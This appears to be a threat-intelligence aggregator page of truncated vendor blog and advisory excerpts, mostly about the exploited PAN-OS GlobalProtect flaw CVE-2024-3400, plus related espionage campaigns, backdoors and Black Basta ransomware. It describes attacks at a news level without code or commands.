Cybersecurity Threat Landscape 2024 Midyear Review
## Table of Contents
Key Takeaways from the Threat Landscape Report 2024
Vulnerability and Threat Analysis in the Cybersecurity Landscape 2024
Cyber Threat Landscape 2024 A Detailed Review
Key Statistics and Their Impact on the 2024 Cybersecurity Landscape
Mid-2024's Most Exploited Vulnerabilities in the Cybersecurity Landscape
Conclusion
As we navigate the complexities of 2024, it’s crucial to pause and reflect on the evolving threat landscape that surrounds us. This moment offers a unique opportunity to scrutinize our triumphs and missteps, understand the events that have decisively shaped our environment, and consider those that have subtly influenced it. By extracting key lessons from our recent experiences, we can fortify our strategies and prepare more effectively for the emerg
Zscaler
CVE-2024-6387 & CVE-2024-6409 | ThreatLabz
blogs_zscaler·2024-08-05·CVSS 8.1
[HIGH] CVE-2024-6387 & CVE-2024-6409 | ThreatLabz
Tenable
Cybersecurity Snapshot: CISA Tells Tech Vendors To Squash Command Injection Bugs, as OpenSSF Calls on Developers To Boost Security Skills
blogs_tenable·2024-07-12
Cybersecurity Snapshot: CISA Tells Tech Vendors To Squash Command Injection Bugs, as OpenSSF Calls on Developers To Boost Security Skills
Bleepingcomputer
CISA urges devs to weed out OS command injection vulnerabilities
blogs_bleepingcomputer·2024-07-10·CVSS 6.0
CVE-2024-20399 [MEDIUM] CISA urges devs to weed out OS command injection vulnerabilities
## CISA urges devs to weed out OS command injection vulnerabilities
## Sergiu Gatlan
CISA and the FBI urged software companies on Wednesday to review their products and eliminate OS command injection vulnerabilities before shipping.
The advisory was released in response to recent attacks that exploited multiple OS command injection security flaws (CVE-2024-20399, CVE-2024-3400, and CVE-2024-21887) to compromise Cisco, Palo Alto, and Ivanti network edge devices.
Velvet Ant, the Chinese state-sponsored threat actor that coordinated these attacks, deployed custom malware to gain persistence on hacked devices as part of a cyber espionage campaign.
"OS command injection vulnerabilities arise when manufacturers fail to properly validate and sanitize user input when constructing
Volexity
Detecting Compromise of CVE-2024-3400 on Palo Alto Networks GlobalProtect Devices
blogs_volexity·2024-05-15·CVSS 10.0
CVE-2024-3400 [CRITICAL] Detecting Compromise of CVE-2024-3400 on Palo Alto Networks GlobalProtect Devices
Memory Forensics
# Detecting Compromise of CVE-2024-3400 on Palo Alto Networks GlobalProtect Devices
May 15, 2024
Volexity Threat Research
Last month, Volexity reported on its discovery of zero-day, in-the-wild exploitation of CVE-2024-3400 in the GlobalProtect feature of Palo Alto Networks PAN-OS by a threat actor Volexity tracks as UTA0218. Palo Alto Networks released an advisory and threat protection signature for the vulnerability within 48 hours of Volexity’s disclosure of the issue to Palo Alto Networks, with official patches and fixes following soon after.
Volexity has conducted several additional incident response investigations and proactive analyses of Palo Alto Networks firewall devices since the initial two cases described in Volexity’s blog post. These recent investigatio
Zscaler
CVE-2024-3661 | ThreatLabz
blogs_zscaler·2024-05-07·CVSS 7.6
[HIGH] CVE-2024-3661 | ThreatLabz
Wiz
Crying Out Cloud - May 2024 Newsletter | Wiz
blogs_wiz·2024-05-06·CVSS 10.0
[CRITICAL] Crying Out Cloud - May 2024 Newsletter | Wiz
Welcome back! In this edition, we bring you the latest in cloud security – noteworthy incidents, exclusive data, and crucial vulnerabilities. Let's dive in.
Here are our top picks of cloud security highlights!
## 🔎 Highlights
Architecture Risks that May Compromise AI-as-a-Service Providers
Wiz research recently performed a security audit of Hugging Face and discovered several security issues that would have allowed an actor running a specially-crafted malicious model on Hugging Face's infrastructure to achieve remote code execution and cross-tenant access to other customers' spaces or models. All these issues were remediated by Hugging Face and no customer action is required.
Learn more in our blog.
## 🐞 High Profile Vulnerabilities
DoS Vulnerability in HTTP/2 CONTINUATION Frames
Bleepingcomputer
22,500 Palo Alto firewalls "possibly vulnerable" to ongoing attacks
blogs_bleepingcomputer·2024-04-19·CVSS 10.0
CVE-2024-3400 [CRITICAL] 22,500 Palo Alto firewalls "possibly vulnerable" to ongoing attacks
## 22,500 Palo Alto firewalls "possibly vulnerable" to ongoing attacks
## Bill Toulas
Approximately 22,500 exposed Palo Alto GlobalProtect firewall devices are likely vulnerable to the CVE-2024-3400 flaw, a critical command injection vulnerability that has been actively exploited in attacks since at least March 26, 2024.
CVE-2024-3400 is a critical vulnerability impacting specific Palo Alto Networks' PAN-OS versions in the GlobalProtect feature that allows unauthenticated attackers to execute commands with root privileges using command injection triggered by arbitrary file creation.
The flaw was disclosed by Palo Alto Networks on April 12, with the security advisory urging system administrators to apply provided mitigations immediately until a patch was made available.
Depending on th
Zscaler
CVE-2024-3400 Activity | ThreatLabz
blogs_zscaler·2024-04-17·CVSS 10.0
[CRITICAL] CVE-2024-3400 Activity | ThreatLabz
Bleepingcomputer
Exploit released for Palo Alto PAN-OS bug used in attacks, patch now
blogs_bleepingcomputer·2024-04-16·CVSS 10.0
CVE-2024-3400 [CRITICAL] Exploit released for Palo Alto PAN-OS bug used in attacks, patch now
## Exploit released for Palo Alto PAN-OS bug used in attacks, patch now
## Sergiu Gatlan
Update 4/16/24: Updated story with more information on how previous mitigations do not protect devices.
Exploit code is now available for a maximum severity and actively exploited vulnerability in Palo Alto Networks' PAN-OS firewall software.
Tracked as CVE-2024-3400, this security flaw can let unauthenticated threat actors execute arbitrary code as root via command injection in low-complexity attacks on vulnerable PAN-OS 10.2, PAN-OS 11.0, and PAN-OS 11.1 firewalls if the device telemetry and GlobalProtect (gateway or portal) feature are enabled.
While Palo Alto Networks has started releasing hotfixes on Monday to secure unpatched firewalls exposed to attacks, the vulnerability has been exploite
Bleepingcomputer
Palo Alto Networks fixes zero-day exploited to backdoor firewalls
blogs_bleepingcomputer·2024-04-15·CVSS 10.0
CVE-2024-3400 [CRITICAL] Palo Alto Networks fixes zero-day exploited to backdoor firewalls
## Palo Alto Networks fixes zero-day exploited to backdoor firewalls
## Sergiu Gatlan
Palo Alto Networks has started releasing hotfixes for a zero-day vulnerability that has been actively exploited since March 26th to backdoor PAN-OS firewalls.
This maximum severity security flaw (CVE-2024-3400) affects PAN-OS 10.2, PAN-OS 11.0, and PAN-OS 11.1 firewalls with device telemetry and GlobalProtect (gateway or portal) enabled.
Unauthenticated threat actors can exploit it remotely to gain root code execution via command injection in low-complexity attacks that don't require user interaction.
"Palo Alto Networks is aware of a limited number of attacks that leverage the exploitation of this vulnerability," the company warned on Friday when it disclosed the zero-day.
The company has now fix
Bleepingcomputer
Palo Alto Networks zero-day exploited since March to backdoor firewalls
blogs_bleepingcomputer·2024-04-13·CVSS 10.0
CVE-2024-3400 [CRITICAL] Palo Alto Networks zero-day exploited since March to backdoor firewalls
## Palo Alto Networks zero-day exploited since March to backdoor firewalls
## Lawrence Abrams
Suspected state-sponsored hackers have been exploiting a zero-day vulnerability in Palo Alto Networks firewalls tracked as CVE-2024-3400 since March 26, using the compromised devices to breach internal networks, steal data and credentials.
Palo Alto Networks warned yesterday that hackers were actively exploiting an unauthenticated remote code execution vulnerability in its PAN-OS firewall software and that patches would be available on April 14.
As the flaw was being used in attacks, Palo Alto Networks decided to disclose it and release mitigations so customers could protect their devices until patches were complete.
A later report by Volexity, which discovered the zero-day flaw, provides mor
Zscaler
Another CVE (PAN-OS Zero Day) | Zscaler
blogs_zscaler·2024-04-12·CVSS 10.0
[CRITICAL] Another CVE (PAN-OS Zero Day) | Zscaler
Volexity
Zero-Day Exploitation of Unauthenticated Remote Code Execution Vulnerability in GlobalProtect (CVE-2024-3400)
blogs_volexity·2024-04-12·CVSS 10.0
CVE-2024-3400 [CRITICAL] Zero-Day Exploitation of Unauthenticated Remote Code Execution Vulnerability in GlobalProtect (CVE-2024-3400)
Threat Intelligence
## Zero-Day Exploitation of Unauthenticated Remote Code Execution Vulnerability in GlobalProtect (CVE-2024-3400)
April 12, 2024
Volexity Threat Research
Volexity would like to thank Palo Alto Networks for their partnership, cooperation, and rapid response to this critical issue. Their research can be found here.
On April 10, 2024, Volexity identified zero-day exploitation of a vulnerability found within the GlobalProtect feature of Palo Alto Networks PAN-OS at one of its network security monitoring (NSM) customers. Volexity received alerts regarding suspect network traffic emanating from the customer’s firewall. A subsequent investigation determined the device had been compromised. The following day, April 11, 2024, Volexity observed further, identical exploitatio
Unit42
Threat Brief: Operation MidnightEclipse, Post-Exploitation Activity Related to CVE-2024-3400 (Updated May 20)
blogs_unit42·2024-04-12·CVSS 10.0
CVE-2024-3400 [CRITICAL] Threat Brief: Operation MidnightEclipse, Post-Exploitation Activity Related to CVE-2024-3400 (Updated May 20)
## Executive Summary
This threat brief is monitored daily and updated as new intelligence is available for us to share. The full update log is at the end of this post and offers the fullest account of all changes made.
Palo Alto Networks and Unit 42 are engaged in tracking activity related to CVE-2024-3400 and are working with external researchers, partners and customers to share information transparently and rapidly.
A critical command injection vulnerability in Palo Alto Networks PAN-OS software enables an unauthenticated attacker to execute arbitrary code with root privileges on the firewall. The vulnerability, assigned CVE-2024-3400, has a CVSS score of 10.0.
This issue is applicable only to PAN-OS 10.2, PAN-OS 11.0, and PAN-OS 11.1 firewalls configured with GlobalProtect gateway o
Tenable
CVE-2024-3400: Zero-Day Vulnerability in Palo Alto Networks PAN-OS GlobalProtect Gateway Exploited in the Wild
blogs_tenable·2024-04-12·CVSS 10.0
[CRITICAL] CVE-2024-3400: Zero-Day Vulnerability in Palo Alto Networks PAN-OS GlobalProtect Gateway Exploited in the Wild
Bleepingcomputer
Palo Alto Networks warns of PAN-OS firewall zero-day used in attacks
blogs_bleepingcomputer·2024-04-12·CVSS 10.0
CVE-2024-3400 [CRITICAL] Palo Alto Networks warns of PAN-OS firewall zero-day used in attacks
## Palo Alto Networks warns of PAN-OS firewall zero-day used in attacks
## Bill Toulas
Today, Palo Alto Networks warns that an unpatched critical command injection vulnerability in its PAN-OS firewall is being actively exploited in attacks.
"Palo Alto Networks is aware of a limited number of attacks that leverage the exploitation of this vulnerability," warns the Palo Alto security bulletin.
The flaw, which has been discovered by Volexity and is tracked as CVE-2024-3400, is a command injection vulnerability that received the maximum severity score of 10.0 as it requires no special privileges or user interaction to exploit.
The vendor clarified that the issue affects specific versions of PAN-OS software when both the GlobalProtect gateway and device telemetry features are enabled.
"A
Sentinelone
Black Basta
blogs_sentinelone·2022-11-30
Black Basta
Recorded Future
Smarter Cybersecurity with IPv6: How Drip Architecture Defeats Spray-and-Pray Attacks
blogs_recorded_future
Smarter Cybersecurity with IPv6: How Drip Architecture Defeats Spray-and-Pray Attacks
# IPv6 Drip Drowns Spray-and-Pray
## AI Hackathons and the Future of Security Architecture
Last week, a few Futurists met up to work out the practical realities of AI-enabled Red Teaming (among other topics). In addition to two days of phenomenal vibe coding in Cursor, the final presentations were light on hyperbole and heavy on capabilities and remarkable outcomes, created in a day or less. Two years ago, when LLMs made their mainstream debut, I was dubious, but the hackathon confirmed recent observations (last three months) that AI is accelerating security workflows (like everything else) at warp speed. Change, soon driven primarily through various agentic flavors, is happening at a pace that is difficult to comprehend.
The flight home was spent considering how to get ahead of the adv
Crowdstrike
CrowdStrike 2025 Global Threat Report: GenAI in Exploits & Cloud Attacks
blogs_crowdstrike
CrowdStrike 2025 Global Threat Report: GenAI in Exploits & Cloud Attacks
## How cyber adversaries use GenAI in vulnerability research and cloud operations
Generative Artificial Intelligence (GenAI) is redefining the cybersecurity landscape. And while many organizations like CrowdStrike are using the revolution in large language models (LLMs) to deliver powerful capabilities , adversaries are also using the technology to advance dangerous tools. In the CrowdStrike 2025 Global Threat Report , threat resear
Zscaler
CISO Monthly Roundup, April 2024: ThreatLabz 2024 Phishing Report, PAN-OS zero day, MadMXShell, Black Hat SEO, Pikabot, Zloader, and security advisories | CXO Revolutionaries
blogs_zscaler
CISO Monthly Roundup, April 2024: ThreatLabz 2024 Phishing Report, PAN-OS zero day, MadMXShell, Black Hat SEO, Pikabot, Zloader, and security advisories | CXO Revolutionaries
## CISO Monthly Roundup, April 2024: ThreatLabz 2024 Phishing Report, PAN-OS zero day, MadMXShell, Black Hat SEO, Pikabot, Zloader, and security advisories
Deepen Desai
Contributor
Zscaler
## May 6, 2024
The CISO Monthly Roundup provides the latest threat research from the ThreatLabz team, along with CISO insights on other cyber-related subjects. Over the past month ThreatLabz released their 2024 Phishing Report, examined the PAN-OS zero day, and analyzed MadMXShell, Black Hat SEO, Pikabot, and Zloader. For those attending RSA, I will be presenting on recent APT attacks on May 9th at 12:20PM.
## Zscaler ThreatLabz 2024 Phishing Repo
Recorded Future
TAG-100 Uses Open-Source Tools in Suspected Global Espionage Campaign, Compromising Two Asia-Pacific Intergovernmental Bodies | Recorded Future
blogs_recorded_future·CVSS 10.0
[CRITICAL] TAG-100 Uses Open-Source Tools in Suspected Global Espionage Campaign, Compromising Two Asia-Pacific Intergovernmental Bodies | Recorded Future
## TAG-100 Uses Open-Source Tools in Suspected Global Espionage Campaign, Compromising Two Asia-Pacific Intergovernmental Bodies
Summary
Recorded Future’s Insikt Group identified a suspected cyber-espionage campaign by TAG-100, targeting global government and private sector organizations. TAG-100 exploited internet-facing devices and used open-source tools like the Go backdoor Pantegana. The campaign compromised two Asia-Pacific intergovernmental organizations and targeted multiple diplomatic and trade entities.
TAG-100 employs open-source remote access capabilities and exploits various internet-facing devices to gain initial access. This activity highlights
Crowdstrike
What You Need to Know About the Critical PAN-OS Zero-Day
blogs_crowdstrike·CVSS 10.0
CVE-2024-3400 [CRITICAL] What You Need to Know About the Critical PAN-OS Zero-Day
## CVE-2024-3400: What You Need to Know About the Critical PAN-OS Zero-Day
## Assess risk exposure and rapidly identify exposed PAN-OS assets with CrowdStrike Falcon® Exposure Management
April 13, 2024
Greynoiseio
NoiseLetter April 2024
blogs_greynoiseio
NoiseLetter April 2024
Sentinelone
Black Basta
blogs_sentinelone·2022-11-30
Black Basta
# Black Basta Ransomware: In-Depth Analysis, Detection, and Mitigation
## Summary of Black Basta Ransomware
Black Basta first emerged in early 2022. The ransomware family is an evolution of the Hermes/Ryuk/Conti families. Black Basta was heavily advertised in underground cybercrime markets. Black Basta practices double extortion – demanding payment for a decryptor, as well as for the non-release of stolen data. There are Windows and Linux variants of Black Basta ransomware. The group is responsible for hundreds of attacks against global targets of varying sectors.
February 2025 Update: Nearly a year’s worth of Black Basta chat logs have been released on Telegram, providing detailed insight into the group's operational workflow, reconnaissance activities, and specific userID and details o
Zscaler
VPN Risk Report Highlights Concerns About Unsafe VPNs
blogs_zscaler
VPN Risk Report Highlights Concerns About Unsafe VPNs
Recorded Future
2025 Cloud Threat Hunting and Defense Landscape
blogs_recorded_future
2025 Cloud Threat Hunting and Defense Landscape
# 2025 Cloud Threat Hunting and Defense Landscape
## Executive Summary
Insikt Group has observed continued trends of growth and increased activity of threat actors leveraging and exploiting cloud infrastructure to broaden the number of victims they target and infect. Recent reporting across the observed incidents shows that cloud-focused threats are converging on a few consistent patterns, which serve as the main sections of this report:
- Exploitation and Misconfiguration
- Cloud Abuse
- Cloud Ransomware
- Credential Abuse, Account Takeover, and Unauthorized Access
- Third-Party Compromise
Across cases, initial access frequently comes from vulnerable or misconfigured services exposed to the internet — including application delivery controllers, monitoring dashboards, email security ga
Greynoiseio
CVE-2024-3400: Command Injection Vulnerability in Palo Alto Networks PAN-OS
blogs_greynoiseio·CVSS 10.0
[CRITICAL] CVE-2024-3400: Command Injection Vulnerability in Palo Alto Networks PAN-OS
Recorded Future
RedNovember Targets Government, Defense, and Technology Organizations
blogs_recorded_future
RedNovember Targets Government, Defense, and Technology Organizations
# RedNovember Targets Government, Defense, and Technology Organizations
Note: The analysis cut-off date for this report was July 25, 2025
## Executive Summary
In July 2024, Insikt Group publicly reported on TAG-100, a threat activity group conducting suspected cyber-espionage activity targeting high-profile government, intergovernmental, and private sector organizations globally using the open-source, multi-platform Go backdoor Pantegana. At the time, we did not attribute this activity to a particular country; however, after reviewing all available evidence, we assess that TAG-100 is highly likely a Chinese state-sponsored threat activity group. Accordingly, Insikt Group now tracks this group under the designation RedNovember.
Between June 2024 and July 2025, RedNovember (which overlap
Zscaler
CISO Monthly Roundup, May 2024: Operation Endgame, Anatsa malware, HijackLoader, and the Zscaler ThreatLabz 2024 VPN Risk Report | CXO Revolutionaries
blogs_zscaler
CISO Monthly Roundup, May 2024: Operation Endgame, Anatsa malware, HijackLoader, and the Zscaler ThreatLabz 2024 VPN Risk Report | CXO Revolutionaries
## CISO Monthly Roundup, May 2024: Operation Endgame, Anatsa malware, HijackLoader, and the Zscaler ThreatLabz 2024 VPN Risk Report
Deepen Desai
Contributor
Zscaler
## Jun 7, 2024
ThreatLabz research on Operation Endgame, Anatsa malware, and HijackLoader. The Zscaler ThreatLabz 2024 VPN Risk Report. Zenith Live 24.
The CISO Monthly Roundup provides the latest threat research from the ThreatLabz team, along with CISO insights on cyber-related subjects. Over the past month ThreatLabz assisted with Operation Endgame, analyzed an Anatsa campaign, examined HijackLoader updates, and released a VPN risk report.
## Operation Endgame extinguishes Smoke
Smoke (a.k.a. SmokeLoader, Dofoil) is a malware that has been plaguing organizations since 2011. Threat actors typically use Smoke to delive
HackerOne
GlobalProtect - OS Command Injection #█████████
hackerone·2026-01-12·CVSS 10.0
[CRITICAL] GlobalProtect - OS Command Injection #█████████
GlobalProtect - OS Command Injection #█████████
**Description:**
A command injection vulnerability in the GlobalProtect feature of Palo Alto Networks PAN-OS software for specific PAN-OS versions and distinct feature configurations may enable an unauthenticated attacker to execute arbitrary code with root privileges on the firewall. Cloud NGFW, Panorama appliances, and Prisma Access are not impacted by this vulnerability.
## References
- https://labs.watchtowr.com/palo-alto-putting-the-protecc-in-globalprotect-CVE-2024-3400/
- https://attackerkb.com/topics/SSTk336Tmf/cve-2024-3400/rapid7-analysis
- https://nvd.nist.gov/vuln/detail/CVE-2024-3400
## Impact
GlobalProtect - OS Command Injection
## System Host(s)
██████
## Affected Product(s) and Version(s)
## CVE Numbers
## Steps to R
ATT&CK
UPSTYLE
mitre_attack·CVSS 10.0
CVE-2024-3400 [CRITICAL] UPSTYLE
UPSTYLE
[UPSTYLE](https://attack.mitre.org/software/S1164) is a Python-based backdoor associated with exploitation of Palo Alto firewalls using CVE-2024-3400 in early 2024. [UPSTYLE](https://attack.mitre.org/software/S1164) has only been observed in relation to this exploitation activity, which involved attempted installation on compromised devices by the threat actor UTA0218.(Citation: Volexity UPSTYLE 2024)(Citation: Palo Alto MidnightEclipse APR 2024)
ATT&CK
Operation MidnightEclipse
mitre_attack·CVSS 10.0
CVE-2024-3400 [CRITICAL] Operation MidnightEclipse
Operation MidnightEclipse
[Operation MidnightEclipse](https://attack.mitre.org/campaigns/C0048) was a campaign conducted in March and April 2024 that involved initial exploit of zero-day vulnerability CVE-2024-3400, a critical command injection vulnerability in the GlobalProtect feature of Palo Alto Networks PAN-OS.(Citation: Volexity UPSTYLE 2024)(Citation: Palo Alto MidnightEclipse APR 2024)
Aliases: Operation MidnightEclipse
- https://security.paloaltonetworks.com/CVE-2024-3400
- https://unit42.paloaltonetworks.com/cve-2024-3400/
- https://www.paloaltonetworks.com/blog/2024/04/more-on-the-pan-os-cve/
- https://www.volexity.com/blog/2024/04/12/zero-day-exploitation-of-unauthenticated-remote-code-execution-vulnerability-in-globalprotect-cve-2024-3400/
- https://www.cisa.gov/known-exploited-vulnerabilities-catalog?field_cve=CVE-2024-3400
2024-04-12
Published
2024-04-12
Added to CISA KEV
Exploited in the wild